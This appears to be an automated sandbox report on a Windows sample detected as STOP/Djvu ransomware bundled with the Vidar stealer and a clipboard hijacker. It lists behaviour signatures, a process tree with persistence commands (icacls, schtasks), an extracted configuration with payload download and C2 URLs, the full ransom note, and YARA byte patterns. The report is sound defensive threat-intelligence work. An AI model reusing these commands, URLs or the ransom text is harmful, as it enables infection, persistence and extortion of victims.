Edit tour

Windows Analysis Report
mJVVW85CnW.exe

Overview

General Information

Sample name:	mJVVW85CnW.exe renamed because original name is a hash value
Original sample name:	47ff102b3b17c3d0d18efa09e2cee04e.exe
Analysis ID:	1430659
MD5:	47ff102b3b17c3d0d18efa09e2cee04e
SHA1:	1119d011dc1e9eb4e07ad2f460f26787a3a29c14
SHA256:	bcbaec2245e008d98b6b8a15dd780aacf1b3afbe3daf68508f48a5e32e283c1c
Tags:	exeStop
Infos:

Detection

Babuk, Clipboard Hijacker, Djvu, Vidar

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus / Scanner detection for submitted sample

Antivirus detection for URL or domain

Detected unpacking (changes PE section rights)

Detected unpacking (overwrites its own PE header)

Found malware configuration

Found ransom note / readme

Malicious sample detected (through community Yara rule)

Multi AV Scanner detection for dropped file

Multi AV Scanner detection for submitted file

Snort IDS alert for network traffic

Yara detected AntiVM3

Yara detected Babuk Ransomware

Yara detected Clipboard Hijacker

Yara detected Djvu Ransomware

Yara detected Vidar

Yara detected Vidar stealer

C2 URLs / IPs found in malware configuration

Contains functionality to inject code into remote processes

Found many strings related to Crypto-Wallets (likely being stolen)

Infects executable files (exe, dll, sys, html)

Injects a PE file into a foreign processes

Machine Learning detection for sample

Modifies existing user documents (likely ransomware behavior)

Sample uses process hollowing technique

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Tries to harvest and steal Bitcoin Wallet information

Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)

Tries to harvest and steal browser information (history, passwords, etc)

Tries to harvest and steal ftp login credentials

Tries to steal Crypto Currency Wallets

Uses schtasks.exe or at.exe to add and modify task schedules

Writes a notice file (html or txt) to demand a ransom

Writes many files with high entropy

AV process strings found (often used to terminate AV products)

Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)

Contains functionality for execution timing, often used to detect debuggers

Contains functionality to call native functions

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)

Contains functionality to check the parent process ID (often done to detect debuggers and analysis systems)

Contains functionality to dynamically determine API calls

Contains functionality to launch a program with higher privileges

Contains functionality to query CPU information (cpuid)

Contains functionality to query locales information (e.g. system language)

Contains functionality to query network adapater information

Contains functionality to read the PEB

Contains functionality to record screenshots

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Detected potential crypto function

Downloads executable code via HTTP

Drops PE files

Drops PE files to the application program directory (C:\ProgramData)

Drops certificate files (DER)

Extensive use of GetProcAddress (often used to hide API calls)

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found dropped PE file which has not been started or loaded

Found evasive API chain (may stop execution after checking a module file name)

Found potential string decryption / allocating functions

HTTP GET or POST without a user agent

IP address seen in connection with other malware

Internet Provider seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

Monitors certain registry keys / values for changes (often done to protect autostart functionality)

PE file contains sections with non-standard names

Queries information about the installed CPU (vendor, model number etc)

Queries the volume information (name, serial number etc) of a device

Sample execution stops while process was sleeping (likely an evasion)

Sample file is different than original file name gathered from version info

Sigma detected: CurrentVersion Autorun Keys Modification

Sigma detected: Suspicious Add Scheduled Task Parent

Sigma detected: Suspicious Schtasks From Env Var Folder

Uses 32bit PE files

Uses Microsoft's Enhanced Cryptographic Provider

Uses a known web browser user agent for HTTP communication

Uses cacls to modify the permissions of files

Uses code obfuscation techniques (call, push, ret)

Yara detected Credential Stealer

Yara signature match

Classification

Process Tree

System is w10x64

mJVVW85CnW.exe (PID: 6932 cmdline: "C:\Users\user\Desktop\mJVVW85CnW.exe" MD5: 47FF102B3B17C3D0D18EFA09E2CEE04E)

mJVVW85CnW.exe (PID: 6984 cmdline: "C:\Users\user\Desktop\mJVVW85CnW.exe" MD5: 47FF102B3B17C3D0D18EFA09E2CEE04E)

icacls.exe (PID: 1068 cmdline: icacls "C:\Users\user\AppData\Local\a2ba404d-ff63-4198-ab65-c81226d8b003" /deny *S-1-1-0:(OI)(CI)(DE,DC) MD5: 2E49585E4E08565F52090B144062F97E)

mJVVW85CnW.exe (PID: 6288 cmdline: "C:\Users\user\Desktop\mJVVW85CnW.exe" --Admin IsNotAutoStart IsNotTask MD5: 47FF102B3B17C3D0D18EFA09E2CEE04E)

mJVVW85CnW.exe (PID: 1516 cmdline: "C:\Users\user\Desktop\mJVVW85CnW.exe" --Admin IsNotAutoStart IsNotTask MD5: 47FF102B3B17C3D0D18EFA09E2CEE04E)

build2.exe (PID: 6264 cmdline: "C:\Users\user\AppData\Local\9d735f84-1d19-402a-bb6c-f54dc28e5a95\build2.exe" MD5: A04031208441077A014F42095FF86107)

build2.exe (PID: 7036 cmdline: "C:\Users\user\AppData\Local\9d735f84-1d19-402a-bb6c-f54dc28e5a95\build2.exe" MD5: A04031208441077A014F42095FF86107)

build3.exe (PID: 2188 cmdline: "C:\Users\user\AppData\Local\9d735f84-1d19-402a-bb6c-f54dc28e5a95\build3.exe" MD5: 41B883A061C95E9B9CB17D4CA50DE770)

build3.exe (PID: 416 cmdline: "C:\Users\user\AppData\Local\9d735f84-1d19-402a-bb6c-f54dc28e5a95\build3.exe" MD5: 41B883A061C95E9B9CB17D4CA50DE770)

schtasks.exe (PID: 2836 cmdline: /C /create /F /sc minute /mo 1 /tn "Azure-Update-Task" /tr "C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exe" MD5: 48C2FE20575769DE916F48EF0676A965)

conhost.exe (PID: 6096 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

mJVVW85CnW.exe (PID: 7152 cmdline: C:\Users\user\AppData\Local\a2ba404d-ff63-4198-ab65-c81226d8b003\mJVVW85CnW.exe --Task MD5: 47FF102B3B17C3D0D18EFA09E2CEE04E)

mJVVW85CnW.exe (PID: 6696 cmdline: C:\Users\user\AppData\Local\a2ba404d-ff63-4198-ab65-c81226d8b003\mJVVW85CnW.exe --Task MD5: 47FF102B3B17C3D0D18EFA09E2CEE04E)

mJVVW85CnW.exe (PID: 6360 cmdline: "C:\Users\user\AppData\Local\a2ba404d-ff63-4198-ab65-c81226d8b003\mJVVW85CnW.exe" --AutoStart MD5: 47FF102B3B17C3D0D18EFA09E2CEE04E)

mJVVW85CnW.exe (PID: 6720 cmdline: "C:\Users\user\AppData\Local\a2ba404d-ff63-4198-ab65-c81226d8b003\mJVVW85CnW.exe" --AutoStart MD5: 47FF102B3B17C3D0D18EFA09E2CEE04E)

mstsca.exe (PID: 3192 cmdline: C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exe MD5: 41B883A061C95E9B9CB17D4CA50DE770)

mstsca.exe (PID: 6264 cmdline: C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exe MD5: 41B883A061C95E9B9CB17D4CA50DE770)

schtasks.exe (PID: 980 cmdline: /C /create /F /sc minute /mo 1 /tn "Azure-Update-Task" /tr "C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exe" MD5: 48C2FE20575769DE916F48EF0676A965)

conhost.exe (PID: 4856 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

mJVVW85CnW.exe (PID: 2844 cmdline: "C:\Users\user\AppData\Local\a2ba404d-ff63-4198-ab65-c81226d8b003\mJVVW85CnW.exe" --AutoStart MD5: 47FF102B3B17C3D0D18EFA09E2CEE04E)

mJVVW85CnW.exe (PID: 6988 cmdline: "C:\Users\user\AppData\Local\a2ba404d-ff63-4198-ab65-c81226d8b003\mJVVW85CnW.exe" --AutoStart MD5: 47FF102B3B17C3D0D18EFA09E2CEE04E)

mstsca.exe (PID: 2676 cmdline: C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exe MD5: 41B883A061C95E9B9CB17D4CA50DE770)

mstsca.exe (PID: 6548 cmdline: C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exe MD5: 41B883A061C95E9B9CB17D4CA50DE770)

mstsca.exe (PID: 332 cmdline: C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exe MD5: 41B883A061C95E9B9CB17D4CA50DE770)

mstsca.exe (PID: 3552 cmdline: C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exe MD5: 41B883A061C95E9B9CB17D4CA50DE770)

mstsca.exe (PID: 5228 cmdline: C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exe MD5: 41B883A061C95E9B9CB17D4CA50DE770)

mstsca.exe (PID: 4520 cmdline: C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exe MD5: 41B883A061C95E9B9CB17D4CA50DE770)

mstsca.exe (PID: 4956 cmdline: C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exe MD5: 41B883A061C95E9B9CB17D4CA50DE770)

mstsca.exe (PID: 6160 cmdline: C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exe MD5: 41B883A061C95E9B9CB17D4CA50DE770)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
Babuk	Babuk Ransomware is a sophisticated ransomware compiled for several platforms. Windows and ARM for Linux are the most used compiled versions, but ESX and a 32bit old PE executable were observed over time. as well It uses an Elliptic Curve Algorithm (Montgomery Algorithm) to build the encryption keys.	No Attribution	http://chuongdong.com/reverse%20engineering/2021/01/03/BabukRansomware/ https://blog.cyble.com/2022/05/06/rebranded-babuk-ransomware-in-action-darkangels-ransomware-performs-targeted-attack/ https://blog.morphisec.com/babuk-ransomware-variant-major-attack https://blog.talosintelligence.com/2021/11/babuk-exploits-exchange.html https://chuongdong.com/reverse%20engineering/2021/01/16/BabukRansomware-v3/	https://malpedia.caad.fkie.fraunhofer.de/details/win.babuk

Name	Description	Attribution	Blogpost URLs	Link
STOP, Djvu	STOP Djvu Ransomware it is a ransomware which encrypts user data through AES-256 and adds one of the dozen available extensions as marker to the encrypted file's name. It is not used to encrypt the entire file but only the first 5 MB. In its original version it was able to run offline and, in that case, it used a hard-coded key which could be extracted to decrypt files.	No Attribution	https://angle.ankura.com/post/102het9/the-stop-ransomware-variant https://any.run/cybersecurity-blog/crackedcantil-breakdown/ https://blog.sekoia.io/privateloader-the-loader-of-the-prevalent-ruzki-ppi-service/ https://cybergeeks.tech/a-detailed-analysis-of-the-stop-djvu-ransomware/ https://cybleinc.com/2021/06/21/djvu-malware-of-stop-ransomware-family-back-with-new-variant/	https://malpedia.caad.fkie.fraunhofer.de/details/win.stop

Name	Description	Attribution	Blogpost URLs	Link
Vidar	Vidar is a forked malware based on Arkei. It seems this stealer is one of the first that is grabbing information on 2FA Software and Tor Browser.	No Attribution	https://0x00-0x7f.github.io/A-Case-of-Vidar-Infostealer-Part-1-(-Unpacking-)/ https://0x00-0x7f.github.io/A-Case-of-Vidar-Infostealer-Part-2/ https://0xtoxin-labs.gitbook.io/malware-analysis/malware-analysis/vidar-stealer-h-and-m-campaign https://0xtoxin.github.io/malware%20analysis/Vidar-Stealer-Campaign/ https://asec.ahnlab.com/en/22932/	https://malpedia.caad.fkie.fraunhofer.de/details/win.vidar

Malware Configuration

Threatname: Vidar

{"C2 url": ["https://steamcommunity.com/profiles/76561199673019888"]}

Threatname: Djvu

{"Download URLs": ["http://sdfjhuz.com/dl/build2.exe", "http://cajgtus.com/files/1/build3.exe"], "C2 url": "http://cajgtus.com/test2/get.php", "Ransom note file": "_README.txt", "Ransom note": "ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nDo not ask assistants from youtube and recovery data sites for help in recovering your data.\r\nThey can use your free decryption quota and scam you.\r\nOur contact is emails in this text document only.\r\nYou can get and look video overview decrypt tool:\r\nhttps://wetransfer.com/downloads/54cdfd152fe98eedb628a1f4ddb7076420240421150208/403a27\r\nPrice of private key and decrypt software is $999.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $499.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nsupport@freshingmail.top\r\n\r\nReserve e-mail address to contact us:\r\ndatarestorehelpyou@airmail.cc\r\n\r\nYour personal ID:\r\n0864PsawqS", "Ignore Files": ["ntuser.dat", "ntuser.dat.LOG1", "ntuser.dat.LOG2", "ntuser.pol", ".sys", ".ini", ".DLL", ".dll", ".blf", ".bat", ".lnk", ".regtrans-ms", "C:\\SystemID\\", "C:\\Users\\Default User\\", "C:\\Users\\Public\\", "C:\\Users\\All Users\\", "C:\\Users\\Default\\", "C:\\Documents and Settings\\", "C:\\ProgramData\\", "C:\\Recovery\\", "C:\\System Volume Information\\", "C:\\Users\\%username%\\AppData\\Roaming\\", "C:\\Users\\%username%\\AppData\\Local\\", "C:\\Windows\\", "C:\\PerfLogs\\", "C:\\ProgramData\\Microsoft\\", "C:\\ProgramData\\Package Cache\\", "C:\\Users\\Public\\", "C:\\$Recycle.Bin\\", "C:\\$WINDOWS.~BT\\", "C:\\dell\\", "C:\\Intel\\", "C:\\MSOCache\\", "C:\\Program Files\\", "C:\\Program Files (x86)\\", "C:\\Games\\", "C:\\Windows.old\\", "D:\\Users\\%username%\\AppData\\Roaming\\", "D:\\Users\\%username%\\AppData\\Local\\", "D:\\Windows\\", "D:\\PerfLogs\\", "D:\\ProgramData\\Desktop\\", "D:\\ProgramData\\Microsoft\\", "D:\\ProgramData\\Package Cache\\", "D:\\Users\\Public\\", "D:\\$Recycle.Bin\\", "D:\\$WINDOWS.~BT\\", "D:\\dell\\", "D:\\Intel\\", "D:\\MSOCache\\", "D:\\Program Files\\", "D:\\Program Files (x86)\\", "D:\\Games\\", "E:\\Users\\%username%\\AppData\\Roaming\\", "E:\\Users\\%username%\\AppData\\Local\\", "E:\\Windows\\", "E:\\PerfLogs\\", "E:\\ProgramData\\Desktop\\", "E:\\ProgramData\\Microsoft\\", "E:\\ProgramData\\Package Cache\\", "E:\\Users\\Public\\", "E:\\$Recycle.Bin\\", "E:\\$WINDOWS.~BT\\", "E:\\dell\\", "E:\\Intel\\", "E:\\MSOCache\\", "E:\\Program Files\\", "E:\\Program Files (x86)\\", "E:\\Games\\", "F:\\Users\\%username%\\AppData\\Roaming\\", "F:\\Users\\%username%\\AppData\\Local\\", "F:\\Windows\\", "F:\\PerfLogs\\", "F:\\ProgramData\\Desktop\\", "F:\\ProgramData\\Microsoft\\", "F:\\Users\\Public\\", "F:\\$Recycle.Bin\\", "F:\\$WINDOWS.~BT\\", "F:\\dell\\", "F:\\Intel\\"], "Public Key": "-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAw0Ftq9GtunuzQZHGiqoG\\\\n8S4cMO\\/Bdgsd+jTtFbVs1bX4OXiYKnMXg4LclKMEHJ2gnP2X09BkzA29UJQlagak\\\\nuAL7j7iRagKeU4tAB8w9rziBYoa9zROqer7J6pf5B11vAvvRq4b3127kAxnMhpgo\\\\ns7MQC7pXIvTkEeGySeG+F5fjSMPUoF1\\/cAg6GuSWOPXoPvXKRA\\/mo+xyHVOKZe2+\\\\nSCpbMHAyMe7o4w\\/i\\/pVjv9g8pRDJtz14qtMuAR38ek+SPJ4PJCxA9e0tOi+p4yNn\\\\nvnFKoL5OwzoF+bvVHnTA7tk4fXB3AyaL9llS0kxEWS7x\\/kNYQyJPh9fimryM03Cy\\\\n1wIDAQAB\\\\n-----END PUBLIC KEY-----"}

Yara Signatures

PCAP (Network Traffic)

Source	Rule	Description	Author	Strings
sslproxydump.pcap	JoeSecurity_Vidar_2	Yara detected Vidar	Joe Security

Memory Dumps

Source	Rule	Description	Author	Strings
00000010.00000002.1940652616.0000000000400000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_Clipboard_Hijacker	Yara detected Clipboard Hijacker	Joe Security
00000010.00000002.1940652616.0000000000400000.00000040.00000400.00020000.00000000.sdmp	Windows_Trojan_Clipbanker_f9f9e79d	unknown	unknown	0x1e03:$a1: 7E 7E 0F B7 04 77 83 F8 41 74 69 83 F8 42 74 64 83 F8 43 74 5F 83
00000010.00000002.1940652616.0000000000400000.00000040.00000400.00020000.00000000.sdmp	Windows_Trojan_Clipbanker_787b130b	unknown	unknown	0x1afa:$mutex_setup: 55 8B EC 83 EC 18 53 56 57 E8 F8 F4 FF FF 68 30 30 40 00 6A 00 6A 00 FF 15 40 40 40 00 FF 15 2C 40 40 00 3D B7 00 00 00 75 08 6A 00 FF 15 10 30 40 00 0x1b87:$new_line_check: 0F B7 C2 89 45 EC 0F B7 C2 83 F8 0A 74 43 BA 0D 0A 00 00 66 3B C2 74 39 83 F8 0D 74 34 83 F8 20 74 2F 83 F8 09 74 2A 0x1b87:$regex1: 0F B7 C2 89 45 EC 0F B7 C2 83 F8 0A 74 43 BA 0D 0A 00 00 66 3B C2 74 39 83 F8 0D 74 34 83 F8 20 74 2F 83 F8 09 74 2A 0x1ead:$regex2: 6A 34 59 66 39 0E 75 7C 0F B7 46 02 6A 30 5A 83 F8 41 74 37 83 F8 42 74 32 66 3B C2 74 2D 83 F8 31 74 28 83 F8 32 74 23 83 F8 33 74 1E 66 3B C1 74 19 83 F8 35 74 14 83 F8 36 74 0F 83 F8 37 74 ... 0x1f35:$regex3: 56 8B F1 56 FF 15 20 40 40 00 83 F8 5F 0F 85 84 00 00 00 6A 38 59 66 39 0E 75 7C 0F B7 46 02 6A 30 5A 83 F8 41 74 37 83 F8 42 74 32 66 3B C2 74 2D 83 F8 31 74 28 83 F8 32 74 23 83 F8 33 74 1E ...
0000001A.00000002.2210378202.0000000000400000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_Clipboard_Hijacker	Yara detected Clipboard Hijacker	Joe Security
0000001A.00000002.2210378202.0000000000400000.00000040.00000400.00020000.00000000.sdmp	Windows_Trojan_Clipbanker_f9f9e79d	unknown	unknown	0x1e03:$a1: 7E 7E 0F B7 04 77 83 F8 41 74 69 83 F8 42 74 64 83 F8 43 74 5F 83
0000001A.00000002.2210378202.0000000000400000.00000040.00000400.00020000.00000000.sdmp	Windows_Trojan_Clipbanker_787b130b	unknown	unknown	0x1afa:$mutex_setup: 55 8B EC 83 EC 18 53 56 57 E8 F8 F4 FF FF 68 30 30 40 00 6A 00 6A 00 FF 15 40 40 40 00 FF 15 2C 40 40 00 3D B7 00 00 00 75 08 6A 00 FF 15 10 30 40 00 0x1b87:$new_line_check: 0F B7 C2 89 45 EC 0F B7 C2 83 F8 0A 74 43 BA 0D 0A 00 00 66 3B C2 74 39 83 F8 0D 74 34 83 F8 20 74 2F 83 F8 09 74 2A 0x1b87:$regex1: 0F B7 C2 89 45 EC 0F B7 C2 83 F8 0A 74 43 BA 0D 0A 00 00 66 3B C2 74 39 83 F8 0D 74 34 83 F8 20 74 2F 83 F8 09 74 2A 0x1ead:$regex2: 6A 34 59 66 39 0E 75 7C 0F B7 46 02 6A 30 5A 83 F8 41 74 37 83 F8 42 74 32 66 3B C2 74 2D 83 F8 31 74 28 83 F8 32 74 23 83 F8 33 74 1E 66 3B C1 74 19 83 F8 35 74 14 83 F8 36 74 0F 83 F8 37 74 ... 0x1f35:$regex3: 56 8B F1 56 FF 15 20 40 40 00 83 F8 5F 0F 85 84 00 00 00 6A 38 59 66 39 0E 75 7C 0F B7 46 02 6A 30 5A 83 F8 41 74 37 83 F8 42 74 32 66 3B C2 74 2D 83 F8 31 74 28 83 F8 32 74 23 83 F8 33 74 1E ...
0000001C.00000002.2793160665.0000000000A80000.00000040.00000020.00020000.00000000.sdmp	Windows_Trojan_RedLineStealer_ed346e4c	unknown	unknown	0x7034:$a: 55 8B EC 8B 45 14 56 57 8B 7D 08 33 F6 89 47 0C 39 75 10 76 15 8B
00000008.00000002.2352727542.00000000009A2000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_Vidar_1	Yara detected Vidar stealer	Joe Security
00000008.00000002.2352727542.00000000009A2000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0000001E.00000002.3443569852.00000000008A0000.00000040.00001000.00020000.00000000.sdmp	JoeSecurity_Clipboard_Hijacker	Yara detected Clipboard Hijacker	Joe Security
0000001E.00000002.3443569852.00000000008A0000.00000040.00001000.00020000.00000000.sdmp	Windows_Trojan_Clipbanker_f9f9e79d	unknown	unknown	0x27a3:$a1: 7E 7E 0F B7 04 77 83 F8 41 74 69 83 F8 42 74 64 83 F8 43 74 5F 83
0000001E.00000002.3443569852.00000000008A0000.00000040.00001000.00020000.00000000.sdmp	Windows_Trojan_Clipbanker_787b130b	unknown	unknown	0x249a:$mutex_setup: 55 8B EC 83 EC 18 53 56 57 E8 F8 F4 FF FF 68 30 30 40 00 6A 00 6A 00 FF 15 40 40 40 00 FF 15 2C 40 40 00 3D B7 00 00 00 75 08 6A 00 FF 15 10 30 40 00 0x2527:$new_line_check: 0F B7 C2 89 45 EC 0F B7 C2 83 F8 0A 74 43 BA 0D 0A 00 00 66 3B C2 74 39 83 F8 0D 74 34 83 F8 20 74 2F 83 F8 09 74 2A 0x2527:$regex1: 0F B7 C2 89 45 EC 0F B7 C2 83 F8 0A 74 43 BA 0D 0A 00 00 66 3B C2 74 39 83 F8 0D 74 34 83 F8 20 74 2F 83 F8 09 74 2A 0x284d:$regex2: 6A 34 59 66 39 0E 75 7C 0F B7 46 02 6A 30 5A 83 F8 41 74 37 83 F8 42 74 32 66 3B C2 74 2D 83 F8 31 74 28 83 F8 32 74 23 83 F8 33 74 1E 66 3B C1 74 19 83 F8 35 74 14 83 F8 36 74 0F 83 F8 37 74 ... 0x28d5:$regex3: 56 8B F1 56 FF 15 20 40 40 00 83 F8 5F 0F 85 84 00 00 00 6A 38 59 66 39 0E 75 7C 0F B7 46 02 6A 30 5A 83 F8 41 74 37 83 F8 42 74 32 66 3B C2 74 2D 83 F8 31 74 28 83 F8 32 74 23 83 F8 33 74 1E ...
00000021.00000002.4017564091.0000000000400000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_Clipboard_Hijacker	Yara detected Clipboard Hijacker	Joe Security
00000021.00000002.4017564091.0000000000400000.00000040.00000400.00020000.00000000.sdmp	Windows_Trojan_Clipbanker_f9f9e79d	unknown	unknown	0x1e03:$a1: 7E 7E 0F B7 04 77 83 F8 41 74 69 83 F8 42 74 64 83 F8 43 74 5F 83
00000021.00000002.4017564091.0000000000400000.00000040.00000400.00020000.00000000.sdmp	Windows_Trojan_Clipbanker_787b130b	unknown	unknown	0x1afa:$mutex_setup: 55 8B EC 83 EC 18 53 56 57 E8 F8 F4 FF FF 68 30 30 40 00 6A 00 6A 00 FF 15 40 40 40 00 FF 15 2C 40 40 00 3D B7 00 00 00 75 08 6A 00 FF 15 10 30 40 00 0x1b87:$new_line_check: 0F B7 C2 89 45 EC 0F B7 C2 83 F8 0A 74 43 BA 0D 0A 00 00 66 3B C2 74 39 83 F8 0D 74 34 83 F8 20 74 2F 83 F8 09 74 2A 0x1b87:$regex1: 0F B7 C2 89 45 EC 0F B7 C2 83 F8 0A 74 43 BA 0D 0A 00 00 66 3B C2 74 39 83 F8 0D 74 34 83 F8 20 74 2F 83 F8 09 74 2A 0x1ead:$regex2: 6A 34 59 66 39 0E 75 7C 0F B7 46 02 6A 30 5A 83 F8 41 74 37 83 F8 42 74 32 66 3B C2 74 2D 83 F8 31 74 28 83 F8 32 74 23 83 F8 33 74 1E 66 3B C1 74 19 83 F8 35 74 14 83 F8 36 74 0F 83 F8 37 74 ... 0x1f35:$regex3: 56 8B F1 56 FF 15 20 40 40 00 83 F8 5F 0F 85 84 00 00 00 6A 38 59 66 39 0E 75 7C 0F B7 46 02 6A 30 5A 83 F8 41 74 37 83 F8 42 74 32 66 3B C2 74 2D 83 F8 31 74 28 83 F8 32 74 23 83 F8 33 74 1E ...
00000013.00000002.2042770332.00000000009BC000.00000040.00000020.00020000.00000000.sdmp	Windows_Trojan_RedLineStealer_ed346e4c	unknown	unknown	0x76cc:$a: 55 8B EC 8B 45 14 56 57 8B 7D 08 33 F6 89 47 0C 39 75 10 76 15 8B
0000000A.00000002.1863423923.0000000004261000.00000040.00000020.00020000.00000000.sdmp	Windows_Trojan_RedLineStealer_ed346e4c	unknown	unknown	0x798:$a: 55 8B EC 8B 45 14 56 57 8B 7D 08 33 F6 89 47 0C 39 75 10 76 15 8B
00000001.00000002.1709912189.0000000000400000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_Djvu	Yara detected Djvu Ransomware	Joe Security
00000001.00000002.1709912189.0000000000400000.00000040.00000400.00020000.00000000.sdmp	Windows_Ransomware_Stop_1e8d48ff	unknown	unknown	0x105b28:$a: E:\Doc\My work (C++)\_Git\Encryption\Release\encrypt_win_api.pdb 0xd9ef:$b: 68 FF FF FF 50 FF D3 8D 85 78 FF FF FF 50 FF D3 8D 85 58 FF
00000001.00000002.1709912189.0000000000400000.00000040.00000400.00020000.00000000.sdmp	MALWARE_Win_STOP	Detects STOP ransomware	ditekSHen	0xffe88:$x1: C:\SystemID\PersonalID.txt 0x100334:$x2: /deny *S-1-1-0:(OI)(CI)(DE,DC) 0xffcf0:$x3: e:\doc\my work (c++)\_git\encryption\ 0x105b28:$x3: E:\Doc\My work (C++)\_Git\Encryption\ 0x1002ec:$s1: " --AutoStart 0x100300:$s1: " --AutoStart 0x103f48:$s2: --ForNetRes 0x103f10:$s3: --Admin 0x104390:$s4: %username% 0x1044b4:$s5: ?pid= 0x1044c0:$s6: &first=true 0x1044d8:$s6: &first=false 0x1003f4:$s7: delself.bat 0x1043f8:$mutex1: {1D6FC66E-D1F3-422C-8A53-C0BBCF3D900D} 0x104420:$mutex2: {FBB4BCC6-05C7-4ADD-B67B-A98A697323C1} 0x104448:$mutex3: {36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
00000007.00000002.1803218835.0000000003670000.00000040.00001000.00020000.00000000.sdmp	JoeSecurity_Vidar_1	Yara detected Vidar stealer	Joe Security
00000003.00000002.1714943939.0000000005DF0000.00000040.00001000.00020000.00000000.sdmp	JoeSecurity_Djvu	Yara detected Djvu Ransomware	Joe Security
00000003.00000002.1714943939.0000000005DF0000.00000040.00001000.00020000.00000000.sdmp	Windows_Ransomware_Stop_1e8d48ff	unknown	unknown	0x105ac8:$a: E:\Doc\My work (C++)\_Git\Encryption\Release\encrypt_win_api.pdb 0xe38f:$b: 68 FF FF FF 50 FF D3 8D 85 78 FF FF FF 50 FF D3 8D 85 58 FF
0000001C.00000002.2793305603.0000000002420000.00000040.00001000.00020000.00000000.sdmp	JoeSecurity_Clipboard_Hijacker	Yara detected Clipboard Hijacker	Joe Security
0000001C.00000002.2793305603.0000000002420000.00000040.00001000.00020000.00000000.sdmp	Windows_Trojan_Clipbanker_f9f9e79d	unknown	unknown	0x27a3:$a1: 7E 7E 0F B7 04 77 83 F8 41 74 69 83 F8 42 74 64 83 F8 43 74 5F 83
0000001C.00000002.2793305603.0000000002420000.00000040.00001000.00020000.00000000.sdmp	Windows_Trojan_Clipbanker_787b130b	unknown	unknown	0x249a:$mutex_setup: 55 8B EC 83 EC 18 53 56 57 E8 F8 F4 FF FF 68 30 30 40 00 6A 00 6A 00 FF 15 40 40 40 00 FF 15 2C 40 40 00 3D B7 00 00 00 75 08 6A 00 FF 15 10 30 40 00 0x2527:$new_line_check: 0F B7 C2 89 45 EC 0F B7 C2 83 F8 0A 74 43 BA 0D 0A 00 00 66 3B C2 74 39 83 F8 0D 74 34 83 F8 20 74 2F 83 F8 09 74 2A 0x2527:$regex1: 0F B7 C2 89 45 EC 0F B7 C2 83 F8 0A 74 43 BA 0D 0A 00 00 66 3B C2 74 39 83 F8 0D 74 34 83 F8 20 74 2F 83 F8 09 74 2A 0x284d:$regex2: 6A 34 59 66 39 0E 75 7C 0F B7 46 02 6A 30 5A 83 F8 41 74 37 83 F8 42 74 32 66 3B C2 74 2D 83 F8 31 74 28 83 F8 32 74 23 83 F8 33 74 1E 66 3B C1 74 19 83 F8 35 74 14 83 F8 36 74 0F 83 F8 37 74 ... 0x28d5:$regex3: 56 8B F1 56 FF 15 20 40 40 00 83 F8 5F 0F 85 84 00 00 00 6A 38 59 66 39 0E 75 7C 0F B7 46 02 6A 30 5A 83 F8 41 74 37 83 F8 42 74 32 66 3B C2 74 2D 83 F8 31 74 28 83 F8 32 74 23 83 F8 33 74 1E ...
0000001E.00000002.3443741375.0000000000950000.00000040.00000020.00020000.00000000.sdmp	Windows_Trojan_RedLineStealer_ed346e4c	unknown	unknown	0x7034:$a: 55 8B EC 8B 45 14 56 57 8B 7D 08 33 F6 89 47 0C 39 75 10 76 15 8B
00000006.00000002.4155355080.0000000000400000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_Djvu	Yara detected Djvu Ransomware	Joe Security
00000006.00000002.4155355080.0000000000400000.00000040.00000400.00020000.00000000.sdmp	Windows_Ransomware_Stop_1e8d48ff	unknown	unknown	0x105b28:$a: E:\Doc\My work (C++)\_Git\Encryption\Release\encrypt_win_api.pdb 0xd9ef:$b: 68 FF FF FF 50 FF D3 8D 85 78 FF FF FF 50 FF D3 8D 85 58 FF
